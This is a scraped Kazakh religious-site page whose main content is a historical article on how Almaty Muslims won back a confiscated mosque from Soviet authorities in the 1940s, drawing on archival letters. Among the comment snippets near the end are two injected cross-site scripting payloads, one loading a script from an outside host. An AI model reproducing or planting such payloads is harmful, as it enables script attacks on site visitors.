АЛМАТЫНЫҢ МЕШІТІ ҚАЛАЙ ҚАЙТАРЫЛДЫ?
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Күн 07:20
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:56 14:44 16:26 17:49
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Жаңалықтар

АЛМАТЫНЫҢ МЕШІТІ ҚАЛАЙ ҚАЙТАРЫЛДЫ?

Кеңес үкіметі 20-жылдардың аяғы мен 30-жылдары дінге қарсы озбыр, әпербақандықпен күрес жүргізіп келсе, немістермен қан қасап соғыс  уақытында бұл қатаң саясат аздап болса да жібіді. 1943 жылы Орта Азия және Қазақстан мұсылмандары діни басқармасы құрылды. Сөйтіп бірен-саран мешіттерді қайтара бастады. Діни істерді тікелей қадағалау 1944 жылы дүниеге келген КСРО Халық Комиссарлары кеңесі жанындағы Діни культтер істері кеңесінің хұзіретіне кірді.

Белгіленген тәртіпке сәйкес жергілікті билік мешітті қайтаруға қатысты жамағаттың әрбір өтінішін қатаң саралап, сұрыптаудан кейін ұсынысты Кремльге жіберіп, жоғары жақтың құптауымен ғана іске асырды. Алайда басқа мекемелерге пайдалануға берілген мешіттерді қайта босаттыру оңайға соқпады. Мұрағат қорларына үңілгенімізде мұсылмандардың ұрда-жықтықпен тартып алынған ғибадат үйлерін жалғыз-жарымдап кері қайтаруға табанды талап пен жүйкені тоздыру арқылы қол жеткізгенін көреміз.

1943 жылдың қарашасында Алматының діндарлары қалалық кеңестен Пушкин көшесі №28 үйдегі бұрынғы шала қазақ аталатын мешітті қайтарып беруді сұрады. Осы өтінішті ескерген қалалық кеңес аталған ғимаратты діндарларға мешіт етіп қайтаруға шешім қабылдап, №175 зауыттан 10 желтоқсаннан қалдырмай босатуды міндеттеді (ҚРОМ, 1711-қор, 1-тізбе, 5-іс, 1-бума, 77-78 беттер). Алайда бұл шешімнің қағаз бетінде қалғанын төмендегі құжаттардан анық байқаймыз.

 

                                               Алматының ескі мешіті, 1948 жыл

1945 жылдың 13 ақпанында КСРО Халық Комиссарлары кеңесі жанындағы Діни культтер істері кеңесінің төрағасы И.Полянскийге Қаз КСР Халық комиссарлары Кеңесі төрағасының орынбасары А.Заговельев пен КСРО Халық Комиссарлары кеңесі жанындағы Діни культтер істері кеңесінің Қазақстан бойынша өкілі Н.Сабитовтің жолдаған хатында Алматы қаласы Пушкин көшесі №28 үйдегі бұрынғы мешіт ғимаратын діндарларға қайтару турысында сұралған.

Хат негіздемесінде тізімдегі ұсынысқа қол қоюшылардың жетеуінің кәмелет жасына толғаны және сот пен сайлау құқынан айырылмағаны айтылған. Ғимарат діни ғұрыптарды өткізуге жарамды, қала орталығында орналасқан. Қазіргі уақытта №175 жұмысшылар зауытының жатақханасы ретінде пайданылуда, сондай-ақ емдік-өндіріс комбинатының эвакогоспительдер емдік-өндіріс комбинатының конторы орналасқан. Мешіттің 1930 жылы Алматы қаласы кеңесі президиумының шешімімен жабылғаны қозғалған. Алматы қаласы мен Алматы облысында жұмыс істеп тұрған басқа мешіт жоқ, сол себепті аталған ғимаратты діндарларға беру сұралады (ҚРОМ, 1711-қор, 1-тізбе, 4-іс, 148-149 беттер).

Жоғары жақтың келісімі алынып, Алматы қалалық кеңесінің қаулысы қабылданып, Мәскеудің мақұлдауы берілсе де жалғыз мешітті қайтару туралы шешім уақытында орындалмай, созбақтала берді. Сондықтан Алматы қаласының жамағаты шарасыздықтан Кремльге шағымдануға мәжбүр болды.

 

 

«КСРО  Жоғары Кеңесі Президиумының Төрағасы М.И.Калининге

Көшірмесі: Қаз КСР Халық Комиссарлар кеңесіне (Совнарком)

Қазақ КСР Алматы қаласы діндар мұсылмандарынан

Өтініш

Алматы қаласында бұрын 12 мешіт болған, бұлардың бәрі діндар мұсылмандардың қарамағынан тартып алынған.

Қаз КСР Халық Комиссарлары кеңесінің (Совнарком) қаулысымен аталған мешіттердің біреуі босатылуы тиіс және Діни басқарма қарамағына ғибадат жасауға қайтарылуы керек.

Осыған қарамастан үкіметтік жергілікті ұйымдар әлі күнге көрсетілген мешітті бермей отыр, сол себепті діндар мұсылмандар намазын жеке үйдің ауласында оқып келеді.

Ұлы мереке Ораза айт намазы да көшеде оқылды. Бұл Отан соғысы күндері герман фашизмі мен жапон милитаризмін жеңіп шығуға ұйымдасқан әрі жүйелі түрде үлкен материалдық көмек жасаған көптеген мұсылман діндарлары тарапынан реніш тудырды.

Енді мұсылмандар екінші ұлы мерекесін салтанатты түрде өткізгісі келеді, сол үшін өкілдер Сізге Алматы қалалық кеңесіне бір мешітті босатып беруді міндеттеуіңді өтінеміз.

Біз Сізден КСРО Конституциясына негізделген талабымызды қанағаттандыруды және Өзіңіздің қолданған шараны мына мекен-жайға хабарлауыңызды сұраймыз.

Алматы қаласы, Гоголь көшесі, Үсенов Садыққа.

20.ІХ.45 ж. Алматы қаласы мұсылмандарының тапсырмасы бойынша»

(ҚРОМ, 1711-қор, 1-тізбе, 6-іс, 59-бет).

 

Үлкен лауызымды тұлғаға хат қысқа, жинақы, сауатты, дәлелді жазылған. Талапта заңды түрде құқық аясында ол кездегі ең жоғары құжат Контитуция бабына арқа сүйеген.

КСРО Халық Комиссарлары кеңесі жанындағы Діни культтер істері Кеңесінің төрағасы И.Полянский Қаз КСР Халық Комиссарлар кеңесінің төрағасы Н.Оңдасыновқа 1945 жылдың 20 қарашасында жіберген хатында КСРО Жоғары Кеңесі Президиумының Төрағасы М.Калининге Алматы қаласындағы Пушкин көшесі №28 үйдегі мешіттің әлі ашылмай отырғаны хақындағы арыз түскенін айтады. Алматы еңбекші депутаттар қалалық кеңесінің 1944 жылғы 24 қазандағы №8-128 шешіміне сілтеме жасап, №175 зауытының 50-60 жұмысшысы жатақхана ретінде тұратыны, сондай-ақ эвакогоспительдер емдік-өндіріс комбинатының конторы орналасқаны, ғимаратқа қосымша құрылыс жасалмағаны, сол себепті оны діндарларға босатып беріп, мешіт ретінде беру мәселесінің қиындық келтірмейтінін алға тартады. Осылайша Алматы қалалық кеңесі Атқару кеңесі төрағасынан бұрынғы мешітті босату туралы шешімінің орындалуын қайта сұрайды.

1945 жылдың 22 қарашасында КСРО Діни культтер істері кеңесінің Қазақстан бойынша өкілі Н.Сабитов Республика басшылары Н.Оңдасынов пен Ж.Шаяхметовке ресми хат жазып, мұсылмандардың қос айт және жұма намаздарын ашық аспан астында оқуы діни культтер қағидасына қайшы келетінін тілге тиек етіп, осы мәселенің оң шешілуіне жәрдемдесуін  сұрайды. 1945 жылдың 17 желтоқсанында республика астанасының жамағаты Қаз КСР Халық Комиссарлар кеңесінің Н.Оңдасыновқа хат жазып, мешітті қайтарып беруді тағы да өтінеді (ҚРОМ, 1711-қор, 1-тізбе, 6-іс, 1-бума, 59-бет).

Жоғарыда келтірілген хаттардан білетініміз, Кеңес үкіметі алғаш орнаған жылдары Алматыда 12 мешіт болған. Тарихи деректердегі олардың Шала қазақ мешіті, Татар мешіті, Ұйғыр мешіті, Дүнген мешіті т.б атауларына қарап, әрқайсының мұсылмандардың әртүрлі этникалық топтарының қаражат-күшімен тұрғызылғанын пайымдаймыз. Мұрағат қорларынан осы мешіттердің қалай тартып алынғаны жайлы айғақтарды жолықтыруға болады. Біз сөз өзегіне айналдырып отырған Шала қазақ мешіті таза шырша ағашынан салынған, көлемі 100 шаршы метр, алайда қай жылдары салынғаны туралы мәлімет әлі де зерттеуді қажет етеді. Десек те Алматыдағы ең алғашқы мешіттердің бірі болған.

«Шала қазақ» ұғымының мағынасын түсіну үшін «Қазақ» газетінің 1914 жылғы 14  ақпанындағы №50 санында Нұраддин Моллағазиннің «Шала қазақ» деген мақаласынан үзінді келтірейік:

«Жетісу облысының үлкен қаласы Алматыда саудамен тұрып қалған 5 жүз үй шамалы һәр рудан қазақ бар. Бұлардың ішінде мешандықша жазылғандары да бар, олар 3-4 үйден артпайды. Көбі қалада тұрғанымен, болыстары қырда. Көбірегі мал саудасын қылады, зор магазин ашып, қызыл малмен сауда қылатындары бар. Бұлардың түп атасынан бері қазақ болып келгендері де һәм ноғай, сарт, қашқарлық, тараншылармен қыз арасқандары да бар. Сондықтан «шала қазақ» дейді. Шала қазақ тек Алматы емес, Жетісудің һәр қаласында бар. Өздерінің ептілігі, тәуекелшілдігімен қайда жүрсе де бір сауда табады, қарап жүрмей бір кәсіпке кіреді, төрт түлік мал болмаса, аштан өлемін демейді.

Алматыда шала қазақтардың жеке мешіті бар. Қанша жыл сартқа араласып, сіңіп кеткен қазақпен сөйлесе кетсең, қазақ қаны барлығы тілінен беп-белгілі болып тұрады. Үй тәрбиесі де кең, қонағасыға да тәуір, қыр кісісін көргенде тарылып, жиырылып отырмайды. Сыртқы қазақ, қырғызға қарағанда бұлар тіршілік тартысына ертерек көндіккен. Алматыда тәртіпті «Мектеп Ысқақияда» қыздар мектебінде де шала қазақтар балаларын көп оқытады. Сарт ағайынша «ноғай-орыстың укасы» деп  тұрмайды. Бірақ орыс ышколына қарауы төмен. Өздері қала ішінде тұрып, городской гимназия, семинарияда балалары жоқ».

Жоғарыда айтылғандай, күреспен қайтарылған ескі ғимарат Кеңес дәуірінде республиканың кіндік шаһарындағы жалғыз мешіт ретінде «Орталық мешіт» атын иеленіп ұзақ жыл жұмыс істеп тұрды. Ташкенттегі Діни басқармаға қарайтын еліміздің қазиятының басшысы алғашқы жылдары амалсыз Семейде отырып келген болса, бертін келе Алматыға ауысты. Сөйтіп қазилық қызмет атқарғандардың бәрінің кабинеттері де осы мешіттің ішінде орналасты.

1990 жылы Қазақстан мұсылмандары діни басқармасы жеке отау тіккенде алғашқы мүфти Рәтбек Нысанбайұлы да осы аядай ғимараттың ішінде отырды. Сол жылдың 9 тамызында Жоғары ислам институты ашылғанда оқу орнының студенттеріне дәрісхана етіп аталмыш тар ғимараттың ішінен бөлме жасалды. Оның тұңғыш ректоры әрі наиб-мүфти Мұхаммад-Хусайн Алсабектовтің де жұмыс кабинеті осында болды. Тарихи мінәжат үйі 1995 жылы қазіргі Алматы орталық мешітінің құрылысына байланысты бұзылды.

 

Шамшәдин КЕРІМ,

профессор,

Нұр-Мүбарак университеті

Әбу Ханифа ғылыми-зерттеу

орталығының директоры

ДЕРЕККӨЗІ muftyat.kz

ҚМДБ ресми сайты

Оқырмандардың пікірі (0)

Қызықты тақырыптар

АЛМАТЫ: РУХАНИ КЕЛІСІМ КҮНІНДЕ ДІН ӨКІЛДЕРІ МЕШІТТЕ БАС ҚОСТЫ (ФОТО)
Елімізде 18 қазан – Рухани келісім күні аталып өтеді. Осындай игі дәстүр жолымен бүгін Алматы қаласы әкімінің орынбасары Ержан Бабақұмаров, Дін істері басқарма басшысы Нұрлан Қиқымов және өзге діни бірлестіктер басшылары Қазақстан мұсылмандары діни басқармасы Алматы өкілдігінде бас қосты. Бас имам Т...
АЛМАТЫЛЫҚ ҚАРИЛАР ҚҰРАН ЖАРЫСЫНДА ТОП ЖАРДЫ (ФОТО)
Түркістан қаласындағы «Конгресс Холл» мәдениет кешенінде Қазақстан мұсылмандары діни басқармасының ұйымдастыруымен Құран Кәрімді жатқа және мәнерлеп оқудан Х республикалық байқауы мәресіне жетті....
Х РЕСПУБЛИКАЛЫҚ ҚАРИЛАР БАЙҚАУЫНЫҢ ЖЕҢІМПАЗЫ АВТОКӨЛІК ЖЕҢІП АЛДЫ (ФОТО)
Түркістан қаласындағы «Конгресс Холл» мәдениет кешенінде Қазақстан мұсылмандары діни басқармасының ұйымдастыруымен Құран Кәрімді жатқа және мәнерлеп оқудан Х республикалық байқауы мәресіне жетті....
ТҮРКІСТАНДА Х РЕСПУБЛИКАЛЫҚ ҚАРИЛАР БАЙҚАУЫ БАСТАЛДЫ (ФОТО)
Түркістан қаласындағы «Конгресс Холл» мәдениет кешенінде Қазақстан мұсылмандары діни басқармасының ұйымдастыруымен Құран Кәрімді жатқа және мәнерлеп оқудан Х республикалық байқау басталды....
ТҮРКІСТАНДА БАБАЛАР РУХЫНА 100 ҚҰРАН ХАТЫМ ДҰҒАСЫ ЖАСАЛДЫ
Бүгін киелі Түркістан қаласындағы Қожа Ахмет Ясауи кесенесінде бабалар рухына 100 Құран хатым дұғасы жасалды.
АЛМАТЫ: ӘЙЕЛ-ҚЫЗДАР ЖАМАҒАТЫНА ДӘРІСТЕР БАСТАЛДЫ
Алматы қаласы мешіттерінде әйел-қыздар жамағатына арналған дәрістер басталды.
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Күн 07:20

Бесінге дейін 01:59

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
20 сағат. бұрын

О милостыне

"/1

X X
20 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi